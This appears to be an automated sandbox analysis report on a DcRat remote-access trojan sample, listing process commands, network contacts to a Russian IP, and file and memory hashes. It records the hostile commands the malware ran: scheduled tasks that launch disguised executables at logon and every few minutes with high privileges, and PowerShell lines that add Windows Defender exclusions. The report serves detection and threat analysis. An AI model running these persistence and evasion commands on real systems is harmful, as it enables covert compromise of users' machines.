schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Microsoft Synchronization Services\ADO.NET\v1.0\wininit.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 11 /tr "'C:\Recovery\20e7eb62-69f6-11ef-be0c-62cb582c238c\audiodg.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodg" /sc ONLOGON /tr "'C:\Recovery\20e7eb62-69f6-11ef-be0c-62cb582c238c\audiodg.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 8 /tr "'C:\Recovery\20e7eb62-69f6-11ef-be0c-62cb582c238c\audiodg.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "1b06c73e9c03f55f8fe3c26f374a889e7095d080c3448d4d040db1ebf46f6aaf1" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Media Player\fr-FR\1b06c73e9c03f55f8fe3c26f374a889e7095d080c3448d4d040db1ebf46f6aaf.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "1b06c73e9c03f55f8fe3c26f374a889e7095d080c3448d4d040db1ebf46f6aaf" /sc ONLOGON /tr "'C:\Program Files\Windows Media Player\fr-FR\1b06c73e9c03f55f8fe3c26f374a889e7095d080c3448d4d040db1ebf46f6aaf.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "1b06c73e9c03f55f8fe3c26f374a889e7095d080c3448d4d040db1ebf46f6aaf1" /sc MINUTE /mo 6 /tr "'C:\Program Files\Windows Media Player\fr-FR\1b06c73e9c03f55f8fe3c26f374a889e7095d080c3448d4d040db1ebf46f6aaf.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 14 /tr "'C:\Recovery\20e7eb62-69f6-11ef-be0c-62cb582c238c\explorer.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Recovery\20e7eb62-69f6-11ef-be0c-62cb582c238c\explorer.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 13 /tr "'C:\Recovery\20e7eb62-69f6-11ef-be0c-62cb582c238c\explorer.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 10 /tr "'C:\Windows\Temp\Crashpad\reports\audiodg.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodg" /sc ONLOGON /tr "'C:\Windows\Temp\Crashpad\reports\audiodg.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 10 /tr "'C:\Windows\Temp\Crashpad\reports\audiodg.exe'" /rl HIGHEST /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\1b06c73e9c03f55f8fe3c26f374a889e7095d080c3448d4d040db1ebf46f6aaf.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Portable Devices\csrss.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Microsoft Synchronization Services\ADO.NET\v1.0\wininit.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\20e7eb62-69f6-11ef-be0c-62cb582c238c\audiodg.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Media Player\fr-FR\1b06c73e9c03f55f8fe3c26f374a889e7095d080c3448d4d040db1ebf46f6aaf.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\20e7eb62-69f6-11ef-be0c-62cb582c238c\explorer.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Temp\Crashpad\reports\audiodg.exe'
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\bbdqqO4wF7.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Admin\AppData\Local\Temp\1b06c73e9c03f55f8fe3c26f374a889e7095d080c3448d4d040db1ebf46f6aaf.exe
"C:\Users\Admin\AppData\Local\Temp\1b06c73e9c03f55f8fe3c26f374a889e7095d080c3448d4d040db1ebf46f6aaf.exe"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 6 /tr "'C:\Windows\ja-JP\winlogon.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Windows\ja-JP\winlogon.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 5 /tr "'C:\Windows\ja-JP\winlogon.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\spoolsv.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\spoolsv.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\spoolsv.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\spoolsv.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\spoolsv.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\spoolsv.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsml" /sc MINUTE /mo 11 /tr "'C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\lsm.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsm" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\lsm.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsml" /sc MINUTE /mo 12 /tr "'C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\lsm.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Windows Media Player\Skins\winlogon.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Media Player\Skins\winlogon.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Windows Media Player\Skins\winlogon.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\Desktop\smss.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\Desktop\smss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\Desktop\smss.exe'" /rl HIGHEST /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\1b06c73e9c03f55f8fe3c26f374a889e7095d080c3448d4d040db1ebf46f6aaf.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\ja-JP\winlogon.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\spoolsv.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\spoolsv.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\lsm.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Media Player\Skins\winlogon.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\Desktop\smss.exe'
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\rhJyFUC1sI.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\spoolsv.exe
"C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\spoolsv.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\49c80d33-fc82-49f6-9887-6194c9b9e4c9.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6b0b9f79-e92d-461e-ba9d-035c6ade5369.vbs"
C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\spoolsv.exe
"C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\spoolsv.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\c00bb0f4-042f-4d3e-84f5-7199ba61a020.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\39935f99-b55e-4815-a8a7-8541c3b8616e.vbs"
C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\spoolsv.exe
"C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\spoolsv.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3fd1e594-cedb-4e66-881e-35b3b8dceec7.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\663cd161-27d6-4f00-b318-bcbaaf2d742d.vbs"
C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\spoolsv.exe
"C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\spoolsv.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bcdc0d54-74b5-4bf0-a765-2c7ef67e8c19.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\24460d33-9f14-4032-a003-e0efeb83429f.vbs"
C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\spoolsv.exe
"C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\spoolsv.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\514d493e-a860-4192-984f-dc65d6893eb9.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\56a8081e-fb2c-4086-ba28-50097651a504.vbs"
C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\spoolsv.exe
"C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\spoolsv.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\48e748f3-a566-4a80-89e5-fd5c2e913cba.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\49c27f2b-b45b-40d4-9793-b432521ec358.vbs"
C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\spoolsv.exe
"C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\spoolsv.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\14bf4083-7c70-4ede-b737-48785590ba59.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\513c39f7-de23-4ef3-af25-e97130d2b705.vbs"
C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\spoolsv.exe
"C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\spoolsv.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\02916f4a-e6af-4d0e-b264-909a38163ccf.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\43ebebfc-f677-4577-a210-efaeec9cf7f8.vbs"
C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\spoolsv.exe
"C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\spoolsv.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\b8593642-4ae0-4d7b-a635-55ead738bac7.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6dbfa688-7d89-49e9-9a8c-a72885053d3d.vbs"
C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\spoolsv.exe
"C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\spoolsv.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\64bd468e-b006-4891-8c9e-ed6fe8762c66.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\5a3c08a6-4162-4791-93b6-48e4dd3f605e.vbs"
C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\spoolsv.exe
"C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\spoolsv.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\4182c578-166e-4201-bf9d-5ec13bf3a395.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\20a87400-8df2-4ca6-b6d5-d0dbe1d1144b.vbs"
C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\spoolsv.exe
"C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\spoolsv.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e533bebb-91a0-40e9-ba70-ab74737a4659.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\7ece93cd-1e7b-4d05-91de-4312fb22e31b.vbs"
Network
| Country | Destination | Domain | Proto |
| RU | 62.109.4.67:80 | 62.109.4.67 | tcp |
| RU | 62.109.4.67:80 | 62.109.4.67 | tcp |
| RU | 62.109.4.67:80 | 62.109.4.67 | tcp |
| RU | 62.109.4.67:80 | 62.109.4.67 | tcp |
| RU | 62.109.4.67:80 | 62.109.4.67 | tcp |
| RU | 62.109.4.67:80 | 62.109.4.67 | tcp |
| RU | 62.109.4.67:80 | 62.109.4.67 | tcp |
| RU | 62.109.4.67:80 | 62.109.4.67 | tcp |
| RU | 62.109.4.67:80 | 62.109.4.67 | tcp |
| RU | 62.109.4.67:80 | 62.109.4.67 | tcp |
| RU | 62.109.4.67:80 | 62.109.4.67 | tcp |
| RU | 62.109.4.67:80 | 62.109.4.67 | tcp |
Files
memory/1924-0-0x000007FEF5DA3000-0x000007FEF5DA4000-memory.dmp
memory/1924-1-0x0000000000270000-0x0000000000412000-memory.dmp
memory/1924-2-0x000007FEF5DA0000-0x000007FEF678C000-memory.dmp
memory/1924-3-0x0000000000240000-0x000000000025C000-memory.dmp
memory/1924-4-0x0000000000260000-0x0000000000270000-memory.dmp
memory/1924-5-0x00000000005A0000-0x00000000005B6000-memory.dmp
memory/1924-7-0x00000000005F0000-0x0000000000600000-memory.dmp
memory/1924-6-0x00000000005C0000-0x00000000005C8000-memory.dmp
memory/1924-8-0x00000000005D0000-0x00000000005D8000-memory.dmp
memory/1924-9-0x00000000005E0000-0x00000000005EC000-memory.dmp
memory/1924-10-0x0000000000790000-0x000000000079C000-memory.dmp
memory/1924-11-0x00000000007A0000-0x00000000007AA000-memory.dmp
memory/1924-12-0x0000000002150000-0x000000000215E000-memory.dmp
memory/1924-13-0x0000000002160000-0x0000000002168000-memory.dmp
memory/1924-14-0x0000000002170000-0x0000000002178000-memory.dmp
memory/1924-15-0x0000000002180000-0x000000000218A000-memory.dmp
memory/1924-16-0x0000000002190000-0x000000000219C000-memory.dmp
C:\Recovery\20e7eb62-69f6-11ef-be0c-62cb582c238c\explorer.exe
| MD5 | 8b03d1f60bdf0b6465c0623109e7269e |
| SHA1 | 33fb1f09f53ca182e1112ed973fce8fa97e4398f |
| SHA256 | 1b06c73e9c03f55f8fe3c26f374a889e7095d080c3448d4d040db1ebf46f6aaf |
| SHA512 | 8c79bf16fdce864799bb6893565aa06f35737f91897537f08129bfe842ad46f39f4081dcc59760df59e416af3ec848fd2dec179d42900defad7d94b4678f2de0 |
C:\Program Files (x86)\Windows Portable Devices\csrss.exe
| MD5 | 0b73d95537d4effd03cef8ff0335ee4e |
| SHA1 | 97c6f7d160c7b0b22e4463a4c0ad9a519d003d8a |
| SHA256 | 7f8e84fccd955d5e01646ca11ecc7a8b70f6985e36e1df0ece02f37c3d0b81e9 |
| SHA512 | ede3722171595d37bc14a9e484471dbfae21a4809e5149cb2b63936ad6867274c26efdbf290146e6a9e37609f8ff659fc5761aa84b32a5c79175f7c8fd019f23 |
C:\Program Files (x86)\Microsoft Synchronization Services\ADO.NET\v1.0\wininit.exe
| MD5 | 73270f0623b4e563f303814af8a35cdf |
| SHA1 | 99d2ec5a6d2796e6e82ae20a2bbce30efd2eec85 |
| SHA256 | 82cfd06a9b9ac15a3851ef57c628c02add7f85ec9fdffcb7cf5618fef87ea010 |
| SHA512 | c101b629eaba445c28830cd08abae82b21b629aec15894861077f9e2369324f5c7c84f38692555764ffd4914ffccde46ef7419346003924013d5a44627565b17 |
C:\Recovery\20e7eb62-69f6-11ef-be0c-62cb582c238c\audiodg.exe
| MD5 | 6be01e880b49b6468d97576d45dab300 |
| SHA1 | 38de2fdc20cc9c0537a778a1c94c1018d7f1203e |
| SHA256 | 41ad555e28f385deade32c635e35e0d7fb12698bd6cdac4e65af5940376cee60 |
| SHA512 | 021beb46a588e0fc058e6f22a6fe2dd03088b42ec89b615611093c03bea538fc486dca0ed6f4f3db499bf69cd0306a49648ac4022323922526bd61133848a2a5 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | d638a8aa8e6ca4ba671124c950a1d0a0 |
| SHA1 | ab787acb4582cbeca2b812df6e4ca95f9aa4d633 |
| SHA256 | 219f2c0b1fc00a6ad4dc91515b21a5c1474ed624b8ee3f9a777917604b0081ee |
| SHA512 | 79eaec864181cfb32bdcfe91d6fcdec68fd50e513abd6bb6cac586cc73bc152a6b3c1f54f578d1358c6532198876c561a13ac5ab816e7b00acdd2d0d065ba417 |
memory/1924-117-0x000007FEF5DA0000-0x000007FEF678C000-memory.dmp
memory/1596-128-0x00000000022B0000-0x00000000022B8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\bbdqqO4wF7.bat
| MD5 | 7e268009943c9f90f1ad458e64bd4145 |
| SHA1 | 0d62cc0b9b2a8ff27c75ee3c987eeac139bb3dcd |
| SHA256 | 62dec3c112c630ee367c57a19d8a9f7ccead079a5633c9f8d5178cfe09abedd2 |
| SHA512 | ded485da3f5b08ed9e995e0a86dd5476fe383cce982b8842ed205d90a6549fc5d28a0b3991820decfd69a4389665183d85a9be09a0dc45e73ed0f000026c220f |
memory/1596-110-0x000000001B5E0000-0x000000001B8C2000-memory.dmp
memory/2896-144-0x0000000000C70000-0x0000000000E12000-memory.dmp
memory/2416-179-0x000000001B600000-0x000000001B8E2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\rhJyFUC1sI.bat
| MD5 | 09f0ae9cb76a3e28f8732870f059cc96 |
| SHA1 | e815d34cb854c821ea430fe5a539658c2f7a5854 |
| SHA256 | aa19ae8aefbeb092fa3b2c05b6ce976e4965684c56ccc977403a1203322abe94 |
| SHA512 | c258a53859a16151f581a096fd68e2bb7688b47b825c6acfea9dc496db7cca703838773febbe5684265d0073e38e59ce321fb9df32bad68060263fc754f0359b |
memory/2416-184-0x0000000001E00000-0x0000000001E08000-memory.dmp
memory/756-213-0x0000000000A90000-0x0000000000C32000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\49c80d33-fc82-49f6-9887-6194c9b9e4c9.vbs
| MD5 | 01b243ef9b7e78fca2c16f7652a45f82 |
| SHA1 | 38771516d9b0567ca3fe9b77d41278d5ab102103 |
| SHA256 | 4a6836a669635fed9f36b345c19723e370c16d6b2fc906c5c31d845c70640ed1 |
| SHA512 | 3e15cffa6331f63b49ad181b51c6df825cde51ffe784216d951f8fc8765a41e444476ed38c88c9f41fe368761b993c7f770cf6de74a92fefed142f21d67a8364 |
C:\Users\Admin\AppData\Local\Temp\6b0b9f79-e92d-461e-ba9d-035c6ade5369.vbs
| MD5 | 427c74111837ab25ebc3e957b7de878a |
| SHA1 | d802d9fdc0d1956f9de4f52138ccb34f4bbccaea |
| SHA256 | b523a1f332255b2ec005b9c5afe4fa1eddd963edcfa9c2fd0be439c9aca428ca |
| SHA512 | fd5bca024eb79c51b6b7a90335e1e7672dcc5ac7da7a862e7a3bc25036b0e31d1feb82d534b4b2cbca04d31752875e43141624f32947c75038512a1ba4a90202 |
C:\Users\Admin\AppData\Local\Temp\c00bb0f4-042f-4d3e-84f5-7199ba61a020.vbs
| MD5 | 6ddc8602de136cfa5a4ce2d411e665ec |
| SHA1 | a67108d2328754a5b1db9c53af3fb2f218a24fe8 |
| SHA256 | f71e4b31c347ea22ac7cf66ade9603b2be991244efe4407c9e544bb4c6ce8cf8 |
| SHA512 | 193111e66532ffd1bdc568918b9aad2d1956f9f3987d550661fd1747ff19fefda119cfdc1ae12752401489d75874b9345bdf493e7046e297a92d3cbd1bb029e2 |
memory/1508-235-0x0000000001100000-0x00000000012A2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\3fd1e594-cedb-4e66-881e-35b3b8dceec7.vbs
| MD5 | 3cb9ceab802c53b354a7d6a4749b7674 |
| SHA1 | 3d4a8a415e3b524dfd4ed851314f16566eccb329 |
| SHA256 | 69d170e27796c7396e64c8164070246d0b5b4833c415153388315e06738a47f6 |
| SHA512 | fbf13cd345096cc33e57e48e5a551b88ab761e08db9a13fe52bb78ee936c6ec1e409b0a9a476c962c830842ba3abda15cb4a2fd36c224268e9626e11556f35c6 |
memory/1644-247-0x00000000000A0000-0x0000000000242000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\bcdc0d54-74b5-4bf0-a765-2c7ef67e8c19.vbs
| MD5 | 29ba92d387d4f243248b004cf0857f40 |
| SHA1 | 84796307761cce50e6fc60aab287bc620b87ae6b |
| SHA256 | 4bbe1433b54e1f85cac6f37a8bd378086a3e668f02279a66281e60d693c9e491 |
| SHA512 | 58a8998f0926c06b0efeca187ff8288c9822356658d4b2d62c278e85d9d795d56cdbb9e43da23f71ed7669d24c8b449a1620617d34e7292a9d86e21f9e7e5d29 |
memory/1596-259-0x00000000010C0000-0x0000000001262000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\514d493e-a860-4192-984f-dc65d6893eb9.vbs
| MD5 | 40f0984d0ded3b409f55488edb51475c |
| SHA1 | bfcdab74e6b53411c3f75c5b7b0f6b14e5082b96 |
| SHA256 | 6605dae4da5e4bb3ec6d69a1f635b32b9c3cf192791a60338c1efd1338474d3d |
| SHA512 | 1a37ddd6bb39e5dc12c59c885f93801503a274fc0609ada578ca01de400357849644d0bc81555fbdc0817cbb26519503bbd52eec7fe72729d7a433434697c67c |
memory/2944-271-0x00000000001F0000-0x0000000000392000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\48e748f3-a566-4a80-89e5-fd5c2e913cba.vbs
| MD5 | 37ce81857a22af9a1ac4599a4e8b6357 |
| SHA1 | c14de35236e37690db1c5be77307bfc63249da80 |
| SHA256 | bce354d6c030451f580193bb07261448cd94831c549861ea37c2f6e9606288ef |
| SHA512 | 59d14d71c51dd1f948e7ff827e22fb4d1ade8c5d26ef355f64762eb6d1d77525cff4b1d12bc1fca0cae8c37c5e460f7cf679015ce81b5eb1d8c336165c215612 |
memory/1892-283-0x0000000000AC0000-0x0000000000C62000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\14bf4083-7c70-4ede-b737-48785590ba59.vbs
| MD5 | 56df3f3f5671dbcbe51c663d33abddc0 |
| SHA1 | 284c056228cfd33e32597b232104d110d7370a5b |
| SHA256 | 3e64a8de9257224e62ebff3b34db31892cea3e9ac2effa39f391dda378752750 |
| SHA512 | 40d95115dba215c551dc8eda0603e3849a866013c67ed41b75c36bffb967e68eda8a62d92dd5b9b88e66e001838da772a3b00e85029bfbfc5c87480acf6adb0d |
C:\Users\Admin\AppData\Local\Temp\02916f4a-e6af-4d0e-b264-909a38163ccf.vbs
| MD5 | c2d423d0db9ca53bac8a5054c82a0b7b |
| SHA1 | 2e6b5a9ca00bd03d004c9b093ec94fad83093b37 |
| SHA256 | f4a133f2af0cf84301e468638a926fdddf5110f4fca12974abfea44bddfa22b9 |
| SHA512 | cd5b0e4d8c168aa983a36c4cb477f36b1c1753a89094c1f8bb1fe4ed352459fcc14c18dc552be98c449193d452c31af809f0c010634fc0210d874067b956c8ff |
memory/1480-306-0x00000000002A0000-0x0000000000442000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\b8593642-4ae0-4d7b-a635-55ead738bac7.vbs
| MD5 | 2816adc772b71371a6192a942146c33c |
| SHA1 | ae5bfc395d8bd5a2e74fec628b43a4013a5b21b6 |
| SHA256 | 6ba7f65c9eaf991e194def1860ac3c77f9c27b30c02482bc7c771840beb95a9f |
| SHA512 | bf9452f406a88d8bd27c4f4a22f624eaaac65dbb794f3f480c0068abf641a307e33462448c776fb68128335aece3f63558a07b6e0fff0053180289e5d0e0f56d |
memory/1584-318-0x0000000000910000-0x0000000000AB2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\64bd468e-b006-4891-8c9e-ed6fe8762c66.vbs
| MD5 | ab98b23fb4347d31512b21ae36d01342 |
| SHA1 | c80f267206d2638d51c5aa56443c999d3b581a99 |
| SHA256 | a6eea52c38284d8635762529ad038c5fd43d413f62421289b47d2765c5b88f2e |
| SHA512 | 771261f8449897ea25255f981f4994668469a153c14ae965d056ef322174de274703dee5d1733cd322194dbf60039485709721c869266b9a88a94841e899709d |
memory/1160-330-0x0000000000FE0000-0x0000000001182000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\4182c578-166e-4201-bf9d-5ec13bf3a395.vbs
| MD5 | f9b3216288370816b0b19ecf76fc4337 |
| SHA1 | cf18e298ee510077c1ab5fc79c100f4aad0a1120 |
| SHA256 | eb804a9a3bfca4e1d63d77440812e3ca6ec4874d9597bb21136716ea6bdf0c7c |
| SHA512 | 9d300943bb825a010602d1d8066e609943e3b6cfcdbcfcdd355e3c40aa3ce85fd7e6d06f5a88bb696decf9035cf8034fbec810c78691ff98326063f9b563a637 |
memory/1432-342-0x0000000001370000-0x0000000001512000-memory.dmp
Analysis: behavioral21
Detonation Overview
Submitted
2025-03-22 06:17
Reported
2025-03-22 06:45
Platform
win7-20241010-en
Max time kernel
151s
Max time network
157s
Command Line
Signatures
DcRat
Dcrat family
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
